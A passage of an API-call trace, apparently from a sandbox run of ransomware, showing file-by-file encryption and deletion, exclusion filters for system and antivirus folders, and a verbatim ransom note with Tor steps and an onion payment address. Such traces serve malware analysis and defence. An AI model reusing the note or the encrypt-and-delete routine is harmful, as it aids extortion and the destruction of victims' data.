lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.715] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.715] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0160.715] GetLastError () returned 0x0 [0160.715] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0160.715] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0160.715] CryptEncrypt (in: hKey=0x9ad5b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x110) returned 1 [0160.715] GetLastError () returned 0x0 [0160.715] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x110, lpOverlapped=0x0) returned 1 [0160.715] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x0, lpOverlapped=0x0) returned 1 [0160.715] WriteFile (in: hFile=0x588, lpBuffer=0x29012e8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesWritten=0x2d7e15c*=0x0, lpOverlapped=0x0) returned 1 [0160.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui")) returned 0x20 [0160.715] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui", dwFileAttributes=0x20) returned 0 [0160.716] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui") returned 1 [0160.716] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui")) returned 0 [0160.716] wcscpy (in: _Dest=0x2d7dcb4, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" [0160.716] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK") returned 1 [0160.716] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7debc | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\.xXE72B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\.xxe72b.tmp")) returned 0xe72b [0160.717] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\.xXE72B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\.xxe72b.tmp"), dwFlags=0x1) returned 0 [0160.717] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\.xXE72B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\.xxe72b.tmp")) returned 1 [0160.717] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0160.718] wcslen (_String="OK") returned 0x2 [0160.718] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.718] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.718] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0160.718] CryptDestroyHash (hHash=0x9ad238) returned 1 [0160.718] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0160.718] FindNextFileW (in: hFindFile=0x9ad1f8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0 [0160.718] GetLastError () returned 0x12 [0160.718] FindClose (in: hFindFile=0x9ad1f8 | out: hFindFile=0x9ad1f8) returned 1 [0160.718] _wfopen (_FileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sk-SK\\Recovers your files.html" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\recovers your files.html"), _Mode="w") returned 0x77ac1268 [0160.718] fputs (in: _Str=" Encrypted files!

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a

Encrypted files!

All your files are encrypted.Using AES256-bit encryption and RSA-2048-bit encryption.
Making it impossible to recover files without the correct private key.
If you are interested in getting is the key and recover your files
You should proceed with the following steps.

The only way to decrypt your files safely is to buy the Descrypt and Private Key software.

Any attempts to restore your files with the third-party software will be fatal for your files!

Important use Firefox or Chrome browser

To proceed with the purchase you must access one of the link below

If neither of the links is online for a long period of time, there is another way to open it, you should install the Tor Browser

If your personal page is not available for a long period there is another way to open your personal page - installation and use of Tor Browser:

  1. run your Internet browser (if you do not know what it is run the Internet Explorer);
  2. enter or copy the address https://www.torproject.org/download/download-easy.html.en into the address bar of your browser and press ENTER;
  3. wait for the site loading;
  4. on the site you will be offered to download Tor Browser; download and run it, follow the installation instructions, wait until the installation is completed;
  5. run Tor Browser;
  6. connect with the button 'Connect' (if you use the English version);
  7. a normal Internet browser window will be opened after the initialization;
  8. type or copy the address

    https://lylh3uqyzay3lhrd.onion

    in this browser address bar;
  9. press ENTER;
  10. the site should be loaded; if for some reason the site is not loading wait for a moment and try again.
If you have any problems during installation or use of Tor Browser, please, visit https://www.youtube.com and type request in the search bar 'Install Tor Browser Windows' and you will find a lot of training videos about Tor Browser installation and use.

Your Key: a8ba77dad846516d1a6737c4237beea3b25e325279bbf473010960209657e13a
", _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.719] fclose (in: _File=0x77ac1268 | out: _File=0x77ac1268) returned 0 [0160.719] wcslen (_String="Unfortunately crypted files: ") returned 0x1d [0160.719] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.719] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.719] wcslen (_String="Fortunately ignored files because of filters: ") returned 0x2e [0160.719] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.719] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0160.719] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*.exe") returned 0 [0160.719] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*.dll") returned 0 [0160.719] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*.lnk") returned 0 [0160.719] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*.bat") returned 0 [0160.719] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*.ini") returned 0 [0160.719] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*.msi") returned 0 [0160.719] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*.scf") returned 0 [0160.719] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*pagefile.sys*") returned 0 [0160.719] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*NTUSER.DAT*") returned 0 [0160.719] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*AppData*") returned 0 [0160.719] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*\\winrar\\*") returned 0 [0160.719] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.719] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*\\java\\*") returned 0 [0160.719] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*\\TeamViewer\\*") returned 0 [0160.719] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*\\windows\\*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*\\ESET\\*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*\\AVG\\*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*\\AVIRA\\*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*\\AVAST Software\\*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*Atheros*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*Realtek*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*bootmgr*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*boot*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*boot*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*CONFIG.SYS*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*IO.SYS*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*MSDOS.SYS*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*NTDETECT.COM*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*ntldr*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*chrome*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*opera*") returned 0 [0160.720] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", pszSpec="*firefox*") returned 0 [0160.720] wcslen (_String="\\\\?\\") returned 0x4 [0160.720] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\*", lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 0x9ad1b8 [0160.720] wcscmp (_String1=".", _String2=".") returned 0 [0160.720] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.720] wcscmp (_String1="..", _String2=".") returned 1 [0160.720] wcscmp (_String1="..", _String2="..") returned 0 [0160.720] FindNextFileW (in: hFindFile=0x9ad1b8, lpFindFileData=0x2d7e3bc | out: lpFindFileData=0x2d7e3bc) returned 1 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NMCRYPT") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Recovers your files.html") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.exe") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.dll") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.lnk") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.bat") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.ini") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.msi") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*.scf") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*pagefile.sys*") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTUSER.DAT*") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*AppData*") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\winrar\\*") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\Internet Explorer\\*") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\java\\*") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\TeamViewer\\*") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\windows\\*") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\ESET\\*") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVG\\*") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVIRA\\*") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*\\AVAST Software\\*") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Atheros*") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*Realtek*") returned 0 [0160.721] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*bootmgr*") returned 0 [0160.722] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.722] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*boot*") returned 0 [0160.722] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*CONFIG.SYS*") returned 0 [0160.722] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*IO.SYS*") returned 0 [0160.722] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*MSDOS.SYS*") returned 0 [0160.722] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*NTDETECT.COM*") returned 0 [0160.722] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*ntldr*") returned 0 [0160.722] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*chrome*") returned 0 [0160.722] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*opera*") returned 0 [0160.722] PathMatchSpecW (pszFile="tipresx.dll.mui", pszSpec="*firefox*") returned 0 [0160.722] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\sl-SI\\tipresx.dll.mui", pszSpec="*") returned 1 [0160.722] strlen (_Str="NMoreira") returned 0x8 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.722] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0160.723] CryptGenRandom (in: 